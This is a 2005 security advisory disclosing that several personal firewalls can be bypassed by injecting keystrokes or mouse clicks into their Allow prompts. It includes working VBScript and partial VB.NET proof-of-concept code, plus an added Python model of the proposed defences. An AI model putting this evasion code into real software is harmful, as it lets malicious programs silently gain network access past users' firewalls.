Multiple Firewall Products Bypass Vulnerability
Thursday, 06 January 2005
ferruh.mavituna.com/article/?769
Multiple Firewall Products Bypass Vulnerability
---------------------------------
Online URL: http://ferruh.mavituna.com/article/?769
Download POC: http://ferruh.mavituna.com/opensource/firewallbypass.zip
(I also attached the .vbs files as .txt; one of them, mousecontrol.txt, is VB.NET source code.)

This is a generic problem of common personal firewall products that accept keyboard shortcuts, or provide an interface that can be clicked, without requiring a password for controlled actions (acting as a server by listening on ports, executing another program, connecting to another computer, etc.).

-------------------------------------------------------------------
Problem;
-------------------------------------------------------------------
Most personal firewalls offer keyboard shortcuts or a clickable interface for controlling traffic. These firewalls are simple to bypass with a multithreaded program that sends keystrokes or controls the mouse. The flaw lets any Trojan or similar program bypass the firewall and act as a server, or reach another computer. Most of these firewalls also have a "remember" option, so once the firewall has been bypassed and the exploit has succeeded, the firewall will never ask again. The threat is similar to shatter attacks, but the method and the impact differ.

-------------------------------------------------------------------
Vulnerable Products (Sending Key Method and Mouse Control);
-------------------------------------------------------------------
These products are vulnerable to both the "Sending Key Method" and the "Mouse Control Method".

Test Platforms; Fully patched Windows XP Professional and Windows 2003 Enterprise Edition (May 19, 2004 - 01.01.2005)

1. ZoneAlarm / ZoneAlarm Pro (www.zonelabs.com) | Fixed
   I.   4.5.530.000 - Tested
   II.  4.5.538.001 - Tested
   III. 5 and newer versions are not vulnerable
2. Kerio (www.kerio.com)
   I.  4.0.14 - Tested
   II. All Versions
3. Agnitium Outpost Firewall (www.agnitium.com)
   I.   2.1.303.4009 (314) - Tested
   II.  2.5.369.4608 (369) - Tested
   III. All Versions
4. Kaspersky Anti-Hacker (www.kaspersky.com)
   I.  1.5.119.0 - Tested
   II. All Versions
5. Look 'n' Stop (www.looknstop.com)
   I.  2.04p2 - Tested
   II. All Versions
6. Symantec's Norton Personal Firewall (www.norton.com)
   I.  2004 - Tested
   II. All Versions

-------------------------------------------------------------------
Vulnerable Products (Mouse Control);
-------------------------------------------------------------------
These products are vulnerable only to the "Mouse Control Method": they do not accept keyboard shortcuts, but they are still vulnerable to "Mouse Control" attacks.

1. Panda Platinum Internet Security
   I.  8.03 (tested)
   II. All Versions
2. Omniquad Personal Firewall
   I.  1.1 (tested)
   II. All Versions

-------------------------------------------------------------------
Proof of Concept;
-------------------------------------------------------------------
Two proofs of concept are attached to this advisory (along with some other POCs for particular firewalls).

The first POC (bypassSendKey.vbs) is written in VBScript. It includes the required key sequences for ZoneAlarm, Kerio, Agnitium, Kaspersky Anti-Hacker, Look 'n' Stop and Symantec's Norton Personal Firewall. The script launches a second instance of itself for multithreading; the second instance sends the shortcuts to the firewall while the first instance tries to connect to the Internet. I did not write a function to detect the installed firewall automatically (although that is easy), so you need to set it yourself.

The second POC (bypassMouseControl.txt) demonstrates bypassing ZoneAlarm Firewall with mouse control; the code is in VB.NET. The program does not use real multithreading, because some firewalls interrupt the running program directly; instead it starts another instance of itself with an argument. Both POCs add themselves to the firewall's list of trusted applications and then bypass the active firewall.

I also attached testFirewall.vbs for testing your firewall's application control.

-------------------------------------------------------------------
Solution;
-------------------------------------------------------------------
All firewalls should ask for a password for every kind of "Allow" action. Passwords can be fooled by their nature, but a password prompt is the most user-friendly protection that is still secure.

As a user of these firewalls, if your firewall supports a "deny all by default" option, enable it, so that your firewall denies all connections by default. After that you can manually select the programs to allow.

-------------------------------------------------------------------
Final Words;
-------------------------------------------------------------------
This is a methodology for bypassing interactive firewalls, so it is possible that this advisory affects other firewalls on the market, and that future firewalls will be affected too. For now I consider this a serious problem for firewalls, until they implement a password, or a randomly generated text that a human must type, for "Allow/Deny" actions.

-------------------------------------------------------------------
History;
-------------------------------------------------------------------
Discovered: 03.05.2004
Vendors Informed: 28.08.2004
Published: 03.01.2005

-------------------------------------------------------------------
Vendors Status;
-------------------------------------------------------------------
Special thanks to ZoneLabs Team.
Ferruh Mavituna
http://ferruh.mavituna.com
pgpkey : http://ferruh.mavituna.com/PGPKey.asc

The multi-firewall SendKeys script (the first POC described above). The loop header, its sleep/increment and the "<>" test were eaten by the page's HTML extraction and are rebuilt here from the delay/repeat arrays and the surviving Dim, Next and Wend lines; the rest is as published.

```vbscript
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'***********************************************************
'HISTORY
'3/5/2004
'Added ZA
'5/5/2004
'Added Kerio, Outpost
'6/5/2004
'Added Kaspersky Anti-Hacker
'5/9/2004
'LooknStop
'5/20/2004
'Norton
'***********************************************************
Option Explicit
Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1), intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
'// Firewalls
'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com
Const ZoneAlarm = 0
'Kerio 4.0.14
Const Kerio = 1
'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com
Const Outpost = 2
'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com
Const Kaspersky = 3
'Look 'n' Stop 2.04p2 | www.looknstop.com
Const LooknStop = 4
'Norton | www.norton.com
Const Norton = 5

'Select Active Firewall
intFirewall = ZoneAlarm

'// Configuration
'Define Keys, Delays, Repeat Times for Firewalls
'arrDelays(fw,0) = delay in ms between rounds, arrDelays(fw,1) = number of rounds
'Kaspersky Anti-Hacker
arrDelays(Kaspersky,0) = 400
arrDelays(Kaspersky,1) = 2
arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK
'ZoneAlarm
arrDelays(ZoneAlarm,0) = 10
arrDelays(ZoneAlarm,1) = 15
arrKeys(ZoneAlarm,0) = "%R" 'Select Remember
arrKeys(ZoneAlarm,1) = "%Y" 'Yes
'Outpost
arrDelays(Outpost,0) = 1000
arrDelays(Outpost,1) = 1
arrKeys(Outpost,0) = "+{TAB}" 'Go back once
arrKeys(Outpost,1) = "{UP 2}" 'Go Up
arrKeys(Outpost,2) = "{ENTER}" 'Enter
'Kerio
arrDelays(Kerio,0) = 100
arrDelays(Kerio,1) = 10
arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again !
arrKeys(Kerio,1) = "%P" ' Yes
'LookNStop
arrDelays(LooknStop,0) = 1000
arrDelays(LooknStop,1) = 1
arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize
arrKeys(LooknStop,1) = "{LEFT}" ' Left
arrKeys(LooknStop,2) = " " ' Space
'Norton
arrDelays(Norton,0) = 100
arrDelays(Norton,1) = 5
arrKeys(Norton,0) = "%A" ' Allow
arrKeys(Norton,1) = "%O" ' OK

If DETERMINEFIREWALL Then
    'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    'First Sleep for a while
    If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY
    'Force
    While i < arrDelays(intFirewall,1)          ' header, sleep and increment lost in extraction,
        i = i + 1                               ' rebuilt from the delay/repeat arrays above
        WScript.Sleep arrDelays(intFirewall,0)
        For j = 0 To 5
            If arrKeys(intFirewall,j) <> "" Then
                shell.sendKeys arrKeys(intFirewall,j)
            End If
        Next
    Wend
    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."
Set shell = Nothing
Wscript.Quit 1

Function connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.open "HEAD", URL, FALSE
    web.send ""
    connect = web.getAllResponseHeaders
    Set web = Nothing
End Function
```

The page also carries the earlier single-firewall versions of this script, which share the header above ("Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading", 4/25/2004) and differ in their constants: the original ZoneAlarm POC (Const DELAY = 10, Const TIMES = 15), the Agnitium Outpost variant (Const DELAY = 1000, Const TIMES = 1, Const EXTRADELAY = 0; modified 5/5/2004 for 2.1.303.4009 (314), tested on 2.5.369.4608 (369) on 02.01.2005) and the Kerio 4.0.14 variant (Const DELAY = 100, Const TIMES = 10; 5/5/2004). Their loop bodies did not survive on this page.

The mouse-control POC (bypassMouseControl, VB.NET): only the second half of the file survives on this page. It resumes inside the condition that separates the launched instance from the launcher; the Else branch starts the second instance with the argument "skipme", so the If branch is the instance that received it.

```vbnet
        ... 1 Then
            'Sleep;
            Sleep(sleepTime * 1000)
            'Try;
            setupFirewalls()
            If slowMotion Then Sleep(1000)
            'First Access
            bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))
            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))
            'Gain Access for HTTP
            Sleep(300)
            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))
            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))
            'Quit !
            Me.Dispose()
        Else
            System.Diagnostics.Process.Start(flagArg, "skipme")
            'Access Internet
            If downloadURL() Then
                MessageBox.Show("Successed !, Firewall ByPassed !", "Firewall ByPassed !", MessageBoxButtons.OK, MessageBoxIcon.Warning)
            End If
            Me.Dispose()
        End If
    End Sub

    'Bypas POC
    Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)
        'Save Old Positions for return !
        Dim oldX As Integer = Cursor.Position.X
        Dim oldY As Integer = Cursor.Position.Y
        'Set New Position
        Cursor.Position = New Point(X, Y)
        'Click
        mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
        mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
        'Return
        Cursor.Position = New Point(oldX, oldY)
    End Sub

    'Connect Internet
    Private Function downloadURL() As Boolean
        downloadURL = True
        Try
            Dim wc As New System.Net.WebClient()
            wc.DownloadFile("http://ferruh.mavituna.com", "C:\firewalltest.htm")
        Catch
            MessageBox.Show("Can not connected !", "Not Connected !", MessageBoxButtons.OK, MessageBoxIcon.Error)
            downloadURL = False
        End Try
    End Function
```
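The Solution section above argues for password-gated "Allow" actions and deny-by-default. The Python model below is an added illustration, not part of the advisory or its POC: it replays the POC's ZoneAlarm accelerator sequence (Alt+R to tick Remember, Alt+Y for Yes) against a prompt under the legacy policy, a password requirement, and a hypothetical check that discards keystrokes carrying the Windows low-level keyboard hook flag LLKHF_INJECTED. KeyEvent, PromptPolicy, simulate_bypass and the demo password are constructed for this example, and the injected-flag check shows the policy logic only (input injected below the hook does not carry the flag), so it is not a complete defence.

```python
from dataclasses import dataclass, field

# Bit set in KBDLLHOOKSTRUCT.flags for keystrokes produced by SendInput/keybd_event.
LLKHF_INJECTED = 0x10

# Accelerators the advisory's POC sends to press the firewall's Yes/Allow/OK button.
ALLOW_KEYS = {"%Y", "%A", "%P", "{ENTER}"}
REMEMBER_KEY = "%R"  # ZoneAlarm's "Remember" accelerator from the POC configuration


@dataclass
class KeyEvent:
    keys: str          # SendKeys-style accelerator, e.g. "%Y" = Alt+Y
    flags: int = 0     # low-level hook flags; LLKHF_INJECTED marks synthesized input
    typed: str = ""    # text entered into the prompt's password field, if it has one


@dataclass
class PromptPolicy:
    """Model of an Allow/Deny prompt; both hardening switches are illustrative."""
    require_password: bool = False   # the advisory's proposed fix
    reject_injected: bool = False    # hypothetical: ignore keystrokes flagged as injected
    password: str = "hunter2"        # constructed demo secret
    remembered: dict = field(default_factory=dict)  # app -> "allow" once Remember is set

    def decide(self, app: str, events: list) -> str:
        """Return 'allow' or 'deny' for one connection attempt by `app`."""
        if app in self.remembered:   # Remember set earlier: the prompt never shows again
            return self.remembered[app]
        if self.reject_injected:     # drop synthesized input before reading the answer
            events = [e for e in events if not e.flags & LLKHF_INJECTED]
        keys = {e.keys for e in events}
        typed = "".join(e.typed for e in events)
        if not keys & ALLOW_KEYS:    # deny by default: no explicit Allow means no access
            return "deny"
        if self.require_password and typed != self.password:
            return "deny"            # a replayed accelerator cannot supply the user's secret
        if REMEMBER_KEY in keys:     # only an accepted Allow can be remembered
            self.remembered[app] = "allow"
        return "allow"


def simulate_bypass(policy: PromptPolicy, app: str = "poc.vbs") -> tuple:
    """Replay the POC's injected Alt+R, Alt+Y against the prompt, then a later silent connect."""
    injected = [KeyEvent(REMEMBER_KEY, LLKHF_INJECTED), KeyEvent("%Y", LLKHF_INJECTED)]
    first = policy.decide(app, injected)
    second = policy.decide(app, [])   # second connection: the program sends nothing
    return first, second
```

Under the legacy policy the replay yields ("allow", "allow"), the second because Remember was ticked by the injected Alt+R; either hardening switch turns both into "deny".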

